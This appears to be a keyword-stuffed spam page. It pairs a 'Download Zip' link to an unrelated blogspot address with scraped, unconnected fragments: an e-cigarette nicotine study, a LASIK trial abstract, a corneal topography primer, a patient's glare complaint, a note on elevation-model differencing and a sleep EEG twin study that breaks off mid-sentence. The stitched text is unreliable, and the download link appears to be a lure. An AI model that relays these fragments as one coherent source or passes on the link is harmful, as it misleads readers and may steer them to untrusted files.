**The site is secure.** 
 The **https://** ensures that you are connecting to the official website and that any information you provide is encrypted and transmitted securely.
 
**Download Zip ––– [https://climmulponorc.blogspot.com/?c=2A0SQa](https://climmulponorc.blogspot.com/?c=2A0SQa)**


 
Methods:  Eighteen daily smokers (average age, 44.1 7.0; 9 males; average CPD, 13.0 5.8) smoked their tobacco cigarettes during an initial visit and returned five times to try an e-cigarette (eGo type) refilled with a nicotine solution (24 mg/ml) of five different flavors: cherry, tobacco, espresso, menthol, and vanilla (randomized order). Assessments at each visit included puffing topography, blood samples for nicotine analysis, and subjective reports of nicotine effects and flavor satisfaction.
 
Results:  Vaping different flavors resulted in different levels of plasma nicotine. The flavor producing the highest plasma nicotine concentration (Cmax) was cherry (median 21.2 ng/ml), which was not significantly different than nicotine delivery from a combustible cigarette (29.2 ng/ml, p > .05). Vanilla e-liquid produced the lowest Cmax (9.7 ng/ml), and participants tended to puff less frequently on vanilla compared to tobacco flavor (p = .013). Flavors did not differ significantly in the speed of nicotine delivery (Tmax). During controlled use, puff duration for all flavors was significantly longer than a combustible cigarette (p < 0.05). After controlling for nicotine delivery, significant differences in flavor enjoyment were detected. Menthol flavored e-liquid was rated as more enjoyable than vanilla and tobacco flavored e-liquids (p < 0.05).
 
Purpose:  To evaluate the safety and effectiveness of topography-guided custom ablation treatment (T-CAT) to correct myopia and myopic astigmatism with laser in situ keratomileusis (LASIK).
 
Methods:  The study comprised patients aged 18 to 65 years old with myopia or myopic astigmatism with a manifest refraction spherical equivalent (MRSE) up to -9.0 diopters (D) and astigmatism of 6.0 D or less. Patients with previous refractive surgery or abnormal topography were excluded. Corneal topographies were obtained using the Allegro Topolyzer, and laser treatment was delivered with the Allegretto Wave Eye-Q excimer laser system. Visual outcomes were evaluated postoperatively at 1 day, 1 week, and 1, 3, 6, 9, and 12 months.

Results:  The clinical trial enrolled 212 patients (249 eyes). The T-CAT procedure significantly reduced the MRSE and cylinder, with stability of outcomes evident from 3 to 12 months after surgery. Compared with the preoperative corrected distance visual acuity (CDVA), the postoperative uncorrected distance visual acuity (UDVA) improved by 1 line or more in 30% of eyes and the postoperative UDVA was at least as good as the preoperative CDVA in 90% of eyes. Most visual symptoms improved after T-CAT. There were no significant treatment-related adverse events or loss of vision.
 
Conclusion:  The T-CAT procedure performed with the diagnostic device and the refractive excimer laser system safely and effectively achieved predictable refractive outcomes and reduced visual symptoms with stable results through 12 months.
 
Financial disclosure:  Dr. Stulting is a paid consultant to Alcon Laboratories, Inc., and was a medical monitor for the U.S. Food and Drug Administration (FDA) clinical trial. Dr. Fant is president of Clinical Research Consultants, Inc. (CRC), the clinical and regulatory consulting group that sponsored the FDA clinical trial. Dr. Fant and CRC were supported by Alcon Laboratories, Inc.
 
**\*Note:\***Technically, topography and tomography are different imaging modalities (explained below). However, both are colloquially referred to as topography. Except for our section differentiating between them, we will also refer to both as topography.
 
In this article, we will review what corneal topography and tomography are, why they are useful, and how to interpret a normal Pentacam scan. We will also review 5 clinical uses for topography that will prepare you well for cornea clinic.
 
Colored Maps: You will see a rainbow of colors on every topographic map. These range from warm colors (red, orange, yellow), to neutrals (green) to cool colors (blue, purple). On our representative Pentacam images below, you will see four different types of maps.
 
**Expected topography:**inferior steepening on anterior axial map and corresponding thinning on pachymetry map. There are many systems to grade keratoconus. Here are some examples of various systems, but these are not necessarily the only criteria by which to rule in or rule out keratoconus.
 
After 1 month from LASIK, I still can see glare (or light streak) in dark room. I didnt have this issue before LASIK and I believe my glasses back then is just normal without CYL correction. The light streak quite long compare my wife (we measure the light streak using ruler)
 
Vertical differencing is the subtraction of grid-based digital elevation models (DEMs). Because topographic differencing quantifies changes to the landscape that are often of a similar magnitude to the errors in the source topography data, topographic differencing tends to accentuate errors in the input datasets. Below, we discuss four examples of common errors in vertical topographic differencing, illustrating cases where the apparent change largely reflects noise and not true landscape change.
 
Interested in learning more about topographic differencing? See our topographic differencing resources with video tutorials, blog posts with differencing examples, workshop presentations, links to GitHub code repositories, and a differencing exercise designed for undergraduate courses.
 
Thank you for visiting nature.com. You are using a browser version with limited support for CSS. To obtain the best experience, we recommend you use a more up to date browser (or turn off compatibility mode in Internet Explorer). In the meantime, to ensure continued support, we are displaying the site without styles and JavaScript.
 
During sleep, a time when conscious perception is suspended, the brain generates stereotypic cortical oscillations unique to this behavioral state1. These oscillations can be readily measured by means of the electroencephalography (EEG), and reflect underlying neuroanatomy and neurophysiology. Two sleep specific oscillations that embody this principle are slow waves and sleep spindles. Slow waves are high-amplitude low frequency waves (
 
Similar to the sleep EEG power spectrum, which is an established trait13,14,15,16, the topographic distribution of power may also be unique to an individual17,18. Finelli *et al*.17 examining multiple sleep EEG recordings in the same individuals found that the similarity between power maps from two nights of the same person was significantly higher than when comparing two non-related individuals. Thus, the sleep EEG may exhibit stable topography, potentially adding another dimension in which an individual subject can be identified.
 
Although the above study suggests intra-individual stability in adults, during development and aging19 the regional distribution of sleep EEG power exhibits significant age-related shifts. One longitudinal study examining SWA across adolescence at five EEG derivations found that the adolescent decline in power showed a posterior to anterior progression, occurring first at an occipital derivation and last at a frontal derivation20. Similarly, in their cross-sectional study, Kurth *et al*.10 examined changes in NREMS topography across development spanning ages 2.4 and 19.4 years using high-density (128 channel) EEG. Maximal power in SWA showed an age-related progression from posterior to anterior brain regions through childhood and adolescence. This same trajectory of posterior to anterior has been observed for cortical maturation in neuroimaging studies21, suggesting that SWA may reflect underlying cortical maturation. Further evidence for this notion comes from a study by Buchmann *et al*.22 in which sleep EEG SWA and grey matter volume as measured via magnetic resonance imaging were recorded in the same subjects.
 
Despite these developmental changes, trait-like features have been detected in the sleep EEG of healthy children and adolescents13,14. Tarokh *et al*.14 examined normalized sleep EEG power spectra in four EEG derivations from two consecutive nights at two longitudinal time points separated by several years and observed high within-subject stability and inter-individual variability which was in a similar range as those reported in adults15,16. Such trait-like features may reflect a genetic contribution to the sleep EEG. Twin studies are the most suitable design for quantifying the degree to which genes contribute to the sleep EEG. Their results are based on a comparison of sleep EEG power in monozygotic (MZ) twins, who share approximately 100 % of their genes, and dizygotic (DZ) twins, who only share about 50 % of their genetic material35. Therefore, greater similarity between monozygotic twins as compared to dizygotic twins can be attributed to the larger proportion of shared genes. Studies in adult twins have shown that the sleep EEG power spectrum is highly heritable13,36,37,38.
 
Therefore, the primary aim of the current study was to examine heritability of sleep EEG topography using high-density sleep EEG recordings in adolescent twins. We hypothesize that the topographic distribution of sleep EEG power will be more similar in monozygotic than dizygotic twins, indicating that regional aspects of the sleep EEG have a genetic component. We also examine the stability of sleep EEG topography within an individual over 6 months.
 
Brain activity during sleep was recorded via a Geodesics EEG system (GSN300; Electrical Geodesic Inc., Eugene, OR, USA) with 64-channel nets. Six channels were used for recording of electrooculogram (4 ch